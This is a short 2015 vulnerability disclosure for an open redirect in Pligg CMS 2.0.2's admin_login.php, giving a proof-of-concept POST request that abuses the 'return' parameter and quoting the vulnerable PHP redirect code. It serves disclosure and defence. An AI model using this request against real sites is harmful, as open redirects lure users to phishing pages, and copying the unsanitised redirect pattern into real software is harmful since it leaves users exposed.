Pligg CMS 2.0.2 Open Redirect
Posted on 19 August 2015
# Exploit Title: Pligg CMS admin_login.php Open Redirect Vulnerability # Google Dork: N/A # Date: 2015/8/18 # Exploit Author: Arash Khazaei # Vendor Homepage: pligg.com # Software Link: https://github.com/Pligg/pligg-cms/releases/download/2.0.2/2.0.2.zip # Version: 2.0.2 (Last Version) # Tested on: Kali , Iceweasel Browser # CVE : N/A # Contact : http://twitter.com/0xClay # Site : http://bhunter.ir Introduction : Pligg CMS Is A CMS Writed In PHP Language And Licensed Under GPL v 2.0. An Open Redirect Vulnerability In admin_login.php File and return= Input . # POC : POST /pligg-cms-master/admin/admin_login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/pligg-cms-master/admin/admin_login.php?return=http://google.com Cookie: panelState=CollapseModules; PHPSESSID=9nd8tubu0j825n9ifobfibot86 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 75 username=admin&password=admin&processlogin=1&return=http://google.com ===================== Vulnerable Code : if(strpos($_SERVER['SERVER_SOFTWARE'], "IIS") && strpos(php_sapi_name(), "cgi") >= 0){ echo '<SCRIPT LANGUAGE="JavaScript">window.location="' . $return . '";</script>'; echo $main_smarty->get_config_vars('PLIGG_Visual_IIS_Logged_In') . '<a href = "'.$return.'">' . $main_smarty->get_config_vars('PLIGG_Visual_IIS_Continue') . '</a>'; } else { header('Location: '.$return); } die; Discovered By : Arash Khazaei
